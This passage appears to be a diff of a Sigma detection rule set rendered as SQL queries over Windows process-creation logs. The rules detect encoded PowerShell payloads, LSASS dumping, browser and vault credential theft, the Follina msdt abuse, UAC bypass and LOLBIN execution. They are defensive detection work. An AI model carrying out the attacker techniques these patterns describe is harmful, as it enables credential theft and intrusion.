'%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine 
LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" + "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" }, { - "title": "Use of OpenConsole", - "id": "814c95cc-8192-4378-a70a-f1aafd877af1", + "title": "PUA - WebBrowserPassView Execution", + "id": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", "status": "experimental", - "description": "Detects usage of OpenConsole binary 
as a LOLBIN to launch other binaries to bypass application Whitelisting", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.t1555.003" ], "falsepositives": [ - "Legitimate use by an administrator" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'OpenConsole.exe' OR NewProcessName LIKE '%\\\\OpenConsole.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.WindowsTerminal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Web Browser Password Viewer' OR NewProcessName LIKE '%\\\\WebBrowserPassView.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_openconsole.yml" + "filename": "proc_creation_win_pua_webbrowserpassview.yml" }, { - "title": "Local Accounts Discovery", - "id": "502b42de-4306-40b4-9596-6f590c81f073", - "status": "test", - "description": "Local accounts, System Owner/User discovery using operating systems utilities", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "title": "Potential Arbitrary Command Execution Using Msdt.EXE", + "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "status": "experimental", + "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033", - "attack.t1087.001" + "attack.defense_evasion", + 
"attack.t1202" ], "falsepositives": [ - "Legitimate administrator or user enumerates local users for legitimate reason" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% /c%' ESCAPE '\\' AND CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Users\\\\%' ESCAPE '\\') AND NOT (CommandLine LIKE '% rmdir %' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '%user%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%/domain%' ESCAPE '\\' OR CommandLine LIKE '%/add%' ESCAPE '\\' OR CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/active%' ESCAPE '\\' OR CommandLine LIKE '%/expires%' ESCAPE '\\' OR CommandLine LIKE '%/passwordreq%' ESCAPE '\\' OR CommandLine LIKE '%/scriptpath%' ESCAPE '\\' OR CommandLine LIKE '%/times%' ESCAPE '\\' OR CommandLine LIKE '%/workstations%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%useraccount%' ESCAPE '\\' AND CommandLine LIKE '%get%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' AND CommandLine LIKE '% /l%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_local_system_owner_account_discovery.yml" + "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" }, { - "title": 
"CobaltStrike Load by Rundll32", - "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", + "title": "Application Whitelisting Bypass via Bginfo", + "id": "aaf46cdc-934e-4284-b329-34aa701e3771", "status": "test", - "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", - "author": "Wojciech Lesicki", + "description": "Execute VBscript code that is referenced within the *.bgi file.", + "author": "Beyu Denis, oscd.community", "tags": [ + "attack.execution", + "attack.t1059.005", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\bginfo.exe' ESCAPE '\\' AND CommandLine LIKE '%/popup%' ESCAPE '\\' AND CommandLine LIKE '%/nolicprompt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" + "filename": "proc_creation_win_lolbin_bginfo.yml" }, { - "title": "Renamed Remote Utilities RAT (RURAT) Execution", - "id": "9ef27c24-4903-4192-881a-3adde7ff92a5", - "status": "experimental", - "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "New Firewall Rule Added Via Netsh.EXE", + "id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "status": "test", + "description": "Detects the addition of a new rule to the Windows firewall via netsh", + "author": "Markus Neis, Sander Wiebing", 
"tags": [ "attack.defense_evasion", - "attack.collection", - "attack.command_and_control", - "attack.discovery", - "attack.s0592" + "attack.t1562.004" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity", + "Software installations and removal" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Remote Utilities' AND NOT ((NewProcessName LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rfusclient.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% firewall %' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\' OR CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' AND CommandLine LIKE '%advfirewall firewall show rule name=all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_rurat.yml" + "filename": "proc_creation_win_netsh_fw_add_rule.yml" }, { - "title": "IIS Native-Code Module Command Line Installation", - "id": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", + "title": "Ping Hex IP", + "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", "status": "test", - "description": "Detects suspicious IIS native-code module installations via command line", + "description": "Detects a ping command that uses a hex encoded IP address", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - 
"attack.t1505.003" + "attack.defense_evasion", + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' AND CommandLine LIKE '%module%' ESCAPE '\\' AND (CommandLine LIKE '%/name:%' ESCAPE '\\' OR CommandLine LIKE '%-name:%' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_appcmd_susp_module_install.yml" + "filename": "proc_creation_win_ping_hex_ip.yml" }, { - "title": "MSHTA Suspicious Execution 01", - "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "status": "test", - "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + "title": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", + "id": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "status": "experimental", + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" + "attack.t1218", + "attack.t1216" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "high", + "level": "medium", 
"rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\SyncAppvPublishingServer.vbs%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_execution.yml" + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" }, { - "title": "Execute Files with Msdeploy.exe", - "id": "646bc99f-6682-4b47-a73a-17b1b64c9d34", + "title": "MMC Spawning Windows Shell", + "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", "status": "test", - "description": "Detects file execution using the msdeploy.exe lolbin", - "author": "Beyu Denis, oscd.community", + "description": "Detects a Windows command line executable started from MMC", + "author": "Karneades, Swisscom CSIRT", "tags": [ - "attack.execution", - "attack.t1218" - ], - "falsepositives": [ - "System administrator Usage" + "attack.lateral_movement", + "attack.t1021.003" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%verb:sync%' ESCAPE '\\' AND CommandLine LIKE '%-source:RunCommand%' ESCAPE '\\' AND CommandLine LIKE '%-dest:runCommand%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\msdeploy.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_msdeploy.yml" + "filename": "proc_creation_win_mmc_susp_child_process.yml" }, { - "title": "Active Directory Database Snapshot Via ADExplorer", - "id": "9212f354-7775-4e28-9c9f-8f0a4544e664", + "title": "Windows Credential Manager Access via VaultCmd", + "id": "58f50261-c53b-4c88-bd12-1d71f12eda4c", "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VaultCmd.exe' ESCAPE '\\' OR OriginalFileName = 'VAULTCMD.EXE') AND CommandLine LIKE '%/listcreds:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_adexplorer_execution.yml" + "filename": "proc_creation_win_vaultcmd_list_creds.yml" }, { - "title": "PUA- IOX Tunneling Tool Execution", - "id": "d7654f02-e04b-4934-9838-65c46f187ebc", - "status": "experimental", - 
"description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "title": "UAC Bypass via Event Viewer", + "id": "be344333-921d-4c4d-8bb8-e584cf584780", + "status": "test", + "description": "Detects UAC bypass method using Windows event viewer", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_iox.yml" + "filename": "proc_creation_win_uac_bypass_eventvwr.yml" }, { - "title": "Suspicious File Characteristics Due to Missing Fields", - "id": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", - "status": "test", - "description": "Detects Executables in the Downloads folder without 
FileVersion,Description,Product,Company likely created with py2exe", - "author": "Markus Neis, Sander Wiebing", + "title": "Mstsc.EXE Execution With Local RDP File", + "id": "5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af", + "status": "experimental", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file", + "author": "Nasreddine Bencherchali (Nextron Systems), Christopher Peacock @securepeacock", "tags": [ - "attack.execution", - "attack.t1059.006" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likely with legitimate usage of \".rdp\" files" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((Description LIKE '\\?' ESCAPE '\\' AND FileVersion LIKE '\\?' ESCAPE '\\') OR (Description LIKE '\\?' ESCAPE '\\' AND Product LIKE '\\?' ESCAPE '\\')) OR (Description LIKE '\\?' ESCAPE '\\' AND Company LIKE '\\?' ESCAPE '\\')) AND NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_file_characteristics.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file.yml" }, { - "title": "AgentExecutor PowerShell Execution", - "id": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", - "status": "experimental", - "description": "Detects execution of the AgentExecutor.exe binary. 
Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "title": "Potential LSASS Process Dump Via Procdump", + "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "status": "stable", + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Legitimate use via Intune management. You exclude script paths and names to reduce FP rate" + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_agentexecutor.yml" + "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" }, { - "title": "UtilityFunctions.ps1 Proxy Dll", - "id": "0403d67d-6227-4ea8-8145-4e72db7da120", + "title": "Use of Remote.exe", + "id": "4eddc365-79b4-43ff-a9d7-99422dc34b93", "status": "experimental", - "description": "Detects the 
use of a Microsoft signed script executing a managed DLL with PowerShell.", - "author": "frack113", + "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%UtilityFunctions.ps1%' ESCAPE '\\' OR CommandLine LIKE '%RegSnapin %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\remote.exe' ESCAPE '\\' OR OriginalFileName = 'remote.exe'))" ], - "filename": "proc_creation_win_lolbin_utilityfunctions.yml" + "filename": "proc_creation_win_lolbin_remote.yml" }, { - "title": "Run PowerShell Script from ADS", - "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", + "title": "Unmount Share Via Net.EXE", + "id": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", "status": "test", - "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", - "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", + "description": "Detects when when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1070.005" ], "falsepositives": [ - "Unknown" + "Administrators or Power users may remove their shares via cmd line" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%share%' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_ads.yml" + "filename": "proc_creation_win_net_share_unmount.yml" }, { - "title": "Suspicious Use of CSharp Interactive Console", - "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", - "status": "test", - "description": "Detects the execution of CSharp interactive console by PowerShell", - "author": "Michael R. (@nahamike01)", + "title": "HackTool - TruffleSnout Execution", + "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "status": "experimental", + "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1127" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Possible depending on environment. 
Pair with other factors such as net connections, command-line args, etc." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'TruffleSnout.exe' OR NewProcessName LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_use_of_csharp_console.yml" + "filename": "proc_creation_win_hktl_trufflesnout.yml" }, { - "title": "Whoami Utility Execution", - "id": "e28a5a99-da44-436d-b7a0-2afc20a5f413", - "status": "test", - "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Obfuscated IP Via CLI", + "id": "56d19cb4-6414-4769-9644-1ed35ffbb148", + "status": "experimental", + "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) 
